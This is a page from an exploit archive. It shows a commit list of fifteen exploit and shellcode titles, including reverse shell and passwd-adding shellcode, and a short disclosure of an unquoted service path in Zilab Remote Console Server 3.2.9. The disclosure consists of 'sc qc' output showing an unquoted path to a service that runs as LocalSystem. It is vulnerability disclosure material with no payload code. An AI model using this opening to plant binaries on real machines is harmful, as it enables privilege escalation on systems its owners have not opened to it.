588067072a
15 changes to exploits/shellcodes sudo 1.8.28 - Security Bypass sudo 1.2.27 - Security Bypass Lavasoft 2.3.4.7 - 'LavasoftTcpService' Unquoted Service Path Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path X.Org X Server 1.20.4 - Local Stack Overflow LiteManager 4.5.0 - 'romservice' Unquoted Serive Path Solaris xscreensaver 11.4 - Privilege Escalation Mikogo 5.2.2.150317 - 'Mikogo-Service' Unquoted Serive Path Whatsapp 2.19.216 - Remote Code Execution Accounts Accounting 7.02 - Persistent Cross-Site Scripting CyberArk Password Vault 10.6 - Authentication Bypass Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes) Linux/x86 - execve /bin/sh Shellcode (25 bytes) Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
23 lines
No EOL
837 B
Text
23 lines
No EOL
837 B
Text
# Exploit Title : Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path
|
|
# Date : 2019-10-15
|
|
# Exploit Author : Cakes
|
|
# Vendor: Zilab Software Inc
|
|
# Version : Zilab Remote Console Server 3.2.9
|
|
# Software: http://html.tucows.com/preview/340137/Zilab-Remote-Console-Server?q=remote+support
|
|
# Tested on Windows 10
|
|
# CVE : N/A
|
|
|
|
|
|
C:\Users\Administrator>sc qc zrcs
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME: zrcs
|
|
TYPE : 10 WIN32_OWN_PROCESS
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 0 IGNORE
|
|
BINARY_PATH_NAME : C:\Program Files (x86)\Zilab\ZRCS\ZRCS.exe
|
|
LOAD_ORDER_GROUP :
|
|
TAG : 0
|
|
DISPLAY_NAME : Zilab Remote Console Server
|
|
DEPENDENCIES :
|
|
SERVICE_START_NAME : LocalSystem |